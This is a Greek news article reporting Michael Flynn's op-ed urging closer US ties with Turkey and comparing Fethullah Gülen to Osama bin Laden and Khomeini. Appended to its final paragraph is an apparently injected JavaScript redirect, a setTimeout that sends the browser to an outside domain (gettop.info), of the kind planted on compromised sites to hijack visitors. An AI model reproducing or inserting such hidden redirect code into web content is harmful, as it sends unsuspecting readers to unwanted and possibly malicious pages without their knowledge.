Κορυφαίος σύμβουλος του Τραμπ συγκρίνει τον Γκιουλέν με τον Οσάμα μπιν Λάντεν!

0
5

 

Ξεκάθαρη θέση υπέρ της Τουρκίας και των θέσεων του Ταγίπ Ερντογάν που χαρακτηρίζει εχθρό του κράτους τον αυτοεξόριστο στις ΗΠΑ Φετουλάχ Γκιουλέν έλαβε κορυφαίος σύμβουλος του Ντόναλντ Τραμπ, προφανώς δίνοντας στίγμα από την πολιτική που θα ακολουθήσει ο νεος πρόεδρος των ΗΠΑ.

Όπως τόνισε ο απόστρατος αντιστράτηγος των αμερικανικών ενόπλων δυνάμεων Μάικλ Φλιν με άρθρο του στην εφημερίδα «Hill», «μέγιστη προτεραιότητα θα πρέπει να αποτελέσουν οι οι σχέσεις με την Τουρκία της αμερικανικής εξωτερικής πολιτικής» ενώ σημείωσε ότι «πρέπει να αρχίσουμε να κατανοούμε ότι ο ρόλος της Τουρκίας είναι ιδιαίτερα ζωτικής σημασίας για τα αμερικανικά συμφέροντα καθώς και πηγή σταθερότητας στην περιοχή».

Μάλιστα επέκρινε τη στάση Ομπάμα που τηρούσε αποστάσεις από την Αγκυρα λέγοντας πως δεν ήταν σοφό και δεν διστάζει να συγκρίνει τον Οσάμα μπιν Λάντεν που ήταν ο εγκέφαλος της τρομοκρατικής επίθεσης στις ΗΠΑ την 11η Σπετεμβρίου με τον Φετουλάχ Γκιουλέν επειδή είναι εχθρός του Ερντογάν.

«Πρέπει να προσαρμόσουμε την εξωτερική μας πολιτική και να αναγνωρίσουμε ότι η Τουρκία αποτελεί προτεραιότητα. Πρέπει να δούμε τον κόσμο από την οπτική της Τουρκίας» είπε αρχικά και συμπλήρωσε: «Τι θα είχαμε κάνει εμείς εάν αμέσως μετά την 11η Σεπτεμβρίου ακούγαμε στις ειδήσεις ότι ο Οσάμα Μπιν Λάντεν ζει σε μια ωραία βίλα σε κάποιο θέρετρο της Τουρκίας ενώ παράλληλα διοικεί 160 σχολές που χρηματοδοτούνται από τους Τούρκους φορολογούμενους;» γράφει ο Φλιν.

Επιπλέον υπογράμμισε ότι παρόλο που ο Γκιουλέν παρουσιάζει τον εαυτό του ως έναν μετριοπαθή ισλαμιστή κληρικό, είναι στην ουσία ριζοσπαστικός καθώς «υπερηφανεύεται δημοσίως για τους «στρατιώτες» του οι οποίοι περιμένουν τις εντολές του για να δράσουν».

Επιπλέον συγκρίνει τον Γκιουλέν με τον Ιρανό ηγέτη Αγιατολάχ Χομεϊνί, παρακινώντας την αμερικανική κυβέρνηση να μην επαναλάβει το ίδιο λάθος και να υποστηρίξει τον Γκιουλέν όπως είχε κάνει και με τον Χομεϊνί.

«Η σιωπή της Ουάσιγκτον σε αυτό το εκρηκτικό θέμα λέει πολλά όταν ακούμε τους απίστευτους ισχυρισμούς ότι ο δημοκρατικά εκλεγμένος πρόεδρος της Τουρκίας υποκίνησε ο ίδιος το στρατιωτικό πραξικόπημα, βομβάρδισε το κοινοβούλιο και υποβάθμισε την εμπιστοσύνη στην οικονομία της Τουρκίας μόνο και μόνο για να καταδιώξει τους πολιτικούς του αντιπάλους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here